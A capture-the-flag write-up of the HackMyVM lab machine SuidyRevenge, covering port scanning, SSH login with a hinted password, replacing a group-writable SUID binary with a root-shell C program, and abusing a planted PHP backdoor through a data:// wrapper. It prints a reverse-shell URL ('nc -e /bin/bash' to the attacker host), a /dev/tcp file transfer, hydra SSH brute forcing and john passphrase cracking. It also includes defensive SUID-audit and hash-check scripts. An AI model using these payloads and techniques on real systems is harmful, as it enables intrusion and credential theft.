
HMV-SuidyRevenge

HMV-SuidyRevenge machine write-up

Port scan

```
┌──(root㉿kakeru)-[~/tmp]
└─# nmap 192.168.58.83
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 21:22 CST
Nmap scan report for bogon (192.168.58.83)
Host is up (0.00056s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: F2:89:91:6B:3E:9D (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
```

Just the usual two ports, so go straight to the web side.

Web enumeration 1

```
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.58.83
Im proud to announce that "theuser" is not anymore in our servers.
Our admin "mudra" is the best admin of the world.
-suidy

<!--

"mudra" is not the best admin, IM IN!!!!
He only changed my password to a different but I had time
to put 2 backdoors (.php) from my KALI into /supersecure to keep the access!

-theuser

-->
```

This hands out several usernames, and the comment reads like a credential: theuser with the password "different". Try that first.

```
┌──(root㉿kakeru)-[~/tmp]
└─# ssh theuser@192.168.58.83
The authenticity of host '192.168.58.83 (192.168.58.83)' can't be established.
ED25519 key fingerprint is SHA256:C2ARiZ0bIPPaLPinl6orW4V74Oo6OBUH2j0JSGrwcu8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.58.83' (ED25519) to the list of known hosts.
theuser@192.168.58.83's password:
Linux suidyrevenge 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct 2 09:19:02 2020 from 192.168.1.58
theuser@suidyrevenge:~$ id
uid=1004(theuser) gid=1004(theuser) groups=1004(theuser)
```

It really does log in.

Privilege escalation 1

Once in, look around for anything useful.
No sudo rights, but there are SUID binaries.

```
theuser@suidyrevenge:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for theuser:
Sorry, user theuser may not run sudo on suidyrevenge.
theuser@suidyrevenge:~$ find / -user root -perm -4000 -print 2>/dev/null
/home/suidy/suidyyyyy
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/mount
/usr/bin/violent
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/passwd
```

There is a SUID file under suidy's home directory (note also /usr/bin/violent, which is not a stock Debian binary; everything else in the list is).

```
theuser@suidyrevenge:/home/suidy$ ls -al
total 52
drwxrwxr-x 3 suidy suidy 4096 Oct 2 2020 .
drwxr-xr-x 8 root root 4096 Oct 1 2020 ..
-rw------- 1 suidy suidy 25 Oct 1 2020 .bash_history
-rwxrwx--- 1 suidy suidy 220 Oct 1 2020 .bash_logout
-rwxrwx--- 1 suidy suidy 3526 Oct 1 2020 .bashrc
drwxr-xr-x 3 suidy suidy 4096 Oct 1 2020 .local
-rw-r----- 1 suidy suidy 262 Oct 1 2020 note.txt
-rwxrwx--- 1 suidy suidy 807 Oct 1 2020 .profile
-rwsrws--- 1 root theuser 16712 Oct 2 2020 suidyyyyy
theuser@suidyrevenge:/home/suidy$ file suidyyyyy
suidyyyyy: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=863d91411490dee69e751d36cbdc3b45b593f459, not stripped
theuser@suidyrevenge:/home/suidy$ ./suidyyyyy
suidy@suidyrevenge:/home/suidy$ id
uid=1005(suidy) gid=1004(theuser) groups=1004(theuser)
```
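The mode that matters in that listing is `-rwsrws--- root theuser`: a root-owned setuid binary that members of group theuser can write to. As an added example (not part of the original write-up), the shell snippet below does the triage a practitioner would run from a fresh low-privilege shell: it lists every setuid/setgid file under a tree that is group- or world-writable, then narrows that to the files the current account can actually open for writing. It assumes GNU find (the `-perm /MODE` syntax); the paths it prints depend on the host.

```shell
#!/bin/sh
# Added example: hunt for setuid/setgid files that a non-owner can write.
# /home/suidy/suidyyyyy on this box is -rwsrws--- root:theuser, i.e. any
# member of group theuser can replace the code that root-owned binary runs.
# Assumes GNU find (-perm /MODE syntax); all paths below are examples.

# List regular files under $1 (default /) that carry set-uid or set-gid and
# are writable by group or by other. -xdev keeps the walk on one filesystem.
find_writable_suid() {
    find "${1:-/}" -xdev -type f \
        \( -perm -4000 -o -perm -2000 \) \
        -perm /022 \
        -print 2>/dev/null
}

# Of those, keep only the files the current user can actually open for
# writing (owner, group membership, or world-write): the set an
# unprivileged account such as theuser could overwrite.
writable_by_me() {
    find_writable_suid "$1" | while IFS= read -r f; do
        if [ -w "$f" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Usage: sh suidcheck.sh [DIR]   (no argument: only defines the functions)
if [ "$#" -gt 0 ]; then
    writable_by_me "$1"
fi
```

On this box `sh suidcheck.sh /` run as theuser would print `/home/suidy/suidyyyyy` and nothing else from the stock set, which is the finding the rest of the escalation builds on.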

It is an executable, and running it drops into a shell as suidy. Pull the file back to the attack box to see what it does.

```
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234 > suidy

suidy@suidyrevenge:/home/suidy$ cat suidyyyyy > /dev/tcp/192.168.58.11/1234
```

In IDA it is simply a program that switches uid/gid and spawns a shell. 0x3ED is 1005, suidy's uid.

```
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setuid(0x3EDu);        // 0x3ED = 1005 = uid of suidy; as root this sets all three uids
  setgid(0x3EDu);        // runs after root was already dropped, so it fails and the
                         // gid stays 1004 (theuser), matching the id output above
  system("/bin/bash");
  return 0;
}
```

suidy's home directory also holds a note.

```
suidy@suidyrevenge:/home/suidy$ ls
note.txt suidyyyyy
suidy@suidyrevenge:/home/suidy$ cat note.txt
I know that theuser is not here anymore but suidyyyyy is now more secure!
root runs the script as in the past that always gives SUID to suidyyyyy binary
but this time also check the size of the file.
WE DONT WANT MORE "theuser" HERE!.
WE ARE SECURE NOW.

-suidy
```

The note says suidyyyyy always gets its SUID bit back, and that the script now also checks the file size.
So the hint clearly points at tampering with this SUID program, and the binary's group is theuser with rws permissions.
Because the file's group is theuser, my first attempt was to write a C file as theuser, but the directory belongs to suidy and theuser cannot write there.
So, as suidy, write a program that spawns bash with uid and gid set to 0.

```
suidy@suidyrevenge:/home/suidy$ ls -al
total 76
drwxrwxr-x 3 suidy suidy 4096 Mar 4 08:54 .
drwxr-xr-x 8 root root 4096 Oct 1 2020 ..
-rw------- 1 suidy suidy 25 Oct 1 2020 .bash_history
-rwxrwx--- 1 suidy suidy 220 Oct 1 2020 .bash_logout
-rwxrwx--- 1 suidy suidy 3526 Oct 1 2020 .bashrc
-rwxr-xr-x 1 suidy theuser 16712 Mar 4 08:54 hack
-rw-r--r-- 1 suidy theuser 97 Mar 4 08:54 hack.c
drwxr-xr-x 3 suidy suidy 4096 Oct 1 2020 .local
-rw-r----- 1 suidy suidy 262 Oct 1 2020 note.txt
-rwxrwx--- 1 suidy suidy 807 Oct 1 2020 .profile
-rwsrws--- 1 root theuser 16712 Oct 2 2020 suidyyyyy
suidy@suidyrevenge:/home/suidy$ cat hack.c
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

/* Same shape as suidyyyyy but aimed at uid/gid 0. Once this code sits in a
   root-owned file with the setuid bit, setuid(0) succeeds and the shell is
   root. setgid(0) is called while still root, so unlike the original it
   also takes effect. */
int main(){
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
```

The note mentioned size, and the compiled hack turns out to be exactly the same size (16712 bytes), so that check is not a problem.
But cp over suidyyyyy fails with "Text file busy": the shell we are in was spawned by that very program, which is still running, and without suidy's password there is no way to get a clean suidy shell. So just delete the file instead.
After a while suidyyyyy reappears, so a scheduled task evidently restores it. One caveat worth knowing: when a non-owner writes to a setuid file, the kernel clears its setuid/setgid bits, so overwriting the binary as theuser only pays off because the root job puts the bit back.
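The note says the root job re-applies the setuid bit as long as the file size still matches. As an added example (the machine's actual script is not shown in the write-up, and this is not it), the shell below models that decision two ways: the size comparison the note describes, and a SHA-256 pinned at install time. It builds two same-size files in a temp directory, one with a single byte changed, and shows that only the hash check refuses the swapped file. sha256sum from coreutils, the pinned size and all paths are assumptions.

```shell
#!/bin/sh
# Added example, not the machine's cron script: compare a size-only check
# with a content-hash check before a root job re-applies setuid.
# Assumes sha256sum (coreutils). Paths and the pinned size are examples.

PINNED_SIZE=16712           # size of the original suidyyyyy from ls -l

file_size() { wc -c < "$1" | tr -d ' '; }
file_hash() { sha256sum "$1" | cut -d' ' -f1; }

# Weak check from the note: same size => treated as the original binary.
size_check_ok() { [ "$(file_size "$1")" -eq "$PINNED_SIZE" ]; }

# Stronger check: the bytes must hash to the value pinned at install time.
hash_check_ok() { [ "$(file_hash "$1")" = "$2" ]; }

# What a hardened job would do: only chmod u+s when the hash matches.
# Returns 0 if the bit was (re)applied, 1 if the file was rejected.
reapply_setuid_if_intact() {
    if hash_check_ok "$1" "$2"; then
        chmod u+s "$1"
    else
        return 1
    fi
}

# Constructed sample: "suidyyyyy" is PINNED_SIZE bytes of 'A'; "swapped" is
# the same length with its first byte changed, the way a recompiled hack.c
# of identical size differs from the original binary.
make_sample_files() {
    head -c "$PINNED_SIZE" /dev/zero | tr '\000' 'A' > "$1/suidyyyyy"
    { printf 'B'; head -c $((PINNED_SIZE - 1)) /dev/zero | tr '\000' 'A'; } \
        > "$1/swapped"
}

demo() {
    d=$(mktemp -d)
    make_sample_files "$d"
    pinned=$(file_hash "$d/suidyyyyy")
    for f in "$d/suidyyyyy" "$d/swapped"; do
        size_check_ok "$f" && s=pass || s=fail
        hash_check_ok "$f" "$pinned" && h=pass || h=fail
        printf '%s: size check %s, hash check %s\n' "${f##*/}" "$s" "$h"
    done
    rm -rf "$d"
}

demo
```

Running it prints `suidyyyyy: size check pass, hash check pass` and `swapped: size check pass, hash check fail`. Even the hash version is only a mitigation: there is still a window between the check and the chmod, and the real fix is to stop the binary being group-writable in the first place.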

```
theuser@suidyrevenge:/home/suidy$ ls
hack hack.c note.txt suidyyyyy
theuser@suidyrevenge:/home/suidy$ cp /home/suidy/hack /home/suidy/suidyyyyy
theuser@suidyrevenge:/home/suidy$ ./suidyyyyy
```

```
theuser@suidyrevenge:/home/suidy$ ./suidyyyyy 
root@suidyrevenge:/home/suidy# id
uid=0(root) gid=0(root) groups=0(root),1004(theuser)
```

That worked. But then why is this machine rated hard? Done this way it is an easy. Checking other write-ups, it turns out the web side offers a second route: get a www-data shell and escalate from there.

Web 2

```
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.58.83
Im proud to announce that "theuser" is not anymore in our servers.
Our admin "mudra" is the best admin of the world.
-suidy

<!--

"mudra" is not the best admin, IM IN!!!!
He only changed my password to a different but I had time
to put 2 backdoors (.php) from my KALI into /supersecure to keep the access!

-theuser

-->
```

Per the hint, theuser dropped two PHP backdoors into /supersecure. First check on the attack box what the stock Kali webshells are called.

```
┌──(root㉿kakeru)-[~/tmp]
└─# ls /usr/share/webshells/php
findsocket php-backdoor.php php-reverse-shell.php qsd-php-backdoor.php simple-backdoor.php
```

In the end simple-backdoor.php is the one that exists; it runs arbitrary commands via the ?cmd parameter.
The two backdoors found under this directory are:

But a reverse shell from it did not work.

So try the other backdoor file.

This one reads a file given in a parameter, which suggests a PHP stream wrapper: pass a data:// URL whose body is PHP code and the include executes it (this only works because the script includes the path and allow_url_include is enabled; otherwise the wrapper would just be read as text).
That gives a www-data shell.

```
http://192.168.58.83/supersecure/mysuperbackdoor.php?file=data://text/plain,%3C?php%20system(%22nc%20-e%20/bin/bash%20192.168.58.11%201234%22);
┌──(root㉿kakeru)-[/usr/share/webshells/php]
└─# nc -lp 1234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Privilege escalation 2

```
www-data@suidyrevenge:~/html$ ls
index.html murdanote.txt supersecure
www-data@suidyrevenge:~/html$ cat murdanote.txt
I always lost my password so Im using
one password from rockyou.txt !

-murda
```

A hint file from murda: the password is in rockyou.txt, so brute-force it.

```
┌──(root㉿kakeru)-[~/tmp]
└─# hydra -l murda -P rockyou.txt ssh://192.168.58.83
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-04 22:36:53
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.58.83:22/
[22][ssh] host: 192.168.58.83 login: murda password: iloveyou
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-04 22:37:00
```

Log in as murda; the home directory holds a secret.txt.

```
murda@suidyrevenge:~$ ls
secret.txt
murda@suidyrevenge:~$ cat secret.txt
I know that theuser is here!
I just got the id_rsa from "violent".
I will put the key in a secure place for theuser!
I hope he find it.
Remember that rockyou.txt is your friend!
```

Following the hint, locate that id_rsa.

```
murda@suidyrevenge:~$ find / -name "id_rsa" -print 2>/dev/null
/usr/games/id_rsa
murda@suidyrevenge:~$ cat /usr/games/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
[key body omitted]
-----END OPENSSH PRIVATE KEY-----
```

Logging in with this private key directly prompts for a passphrase, so crack it with john first.

```
┌──(root㉿kakeru)-[~/tmp]
└─# ssh2john id_rsa > hash

┌──(root㉿kakeru)-[~/tmp]
└─# john --wordlist=./rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ihateu (id_rsa)
1g 0:00:00:42 DONE (2025-03-04 23:01) 0.02329g/s 29.07p/s 29.07c/s 29.07C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

The key's passphrase is ihateu; with it the key logs in over SSH as violent.

```
violent@suidyrevenge:~$ find / -user violent -print 2>/dev/null | grep -ivE "sys|run|proc"
/home/violent
/home/violent/.bashrc
/home/violent/.bash_logout
/home/violent/.ssh
/home/violent/.ssh/id_rsa
/home/violent/.ssh/authorized_keys
/home/violent/.ssh/id_rsa.pub
/home/violent/.bash_history
/home/violent/.profile
/dev/pts/
```

Nothing useful turned up for this user either, so in the end the route still goes back to theuser and from there to suidy.

Summary

This machine is odd: it sets up a lot of red herrings, yet theuser can be logged into right at the start, which makes the rest feel unnecessary, and the privilege-escalation part seems a bit buggy too.
I guess there really is a file-size check, but the small setuid C file I wrote compiled to exactly the same size...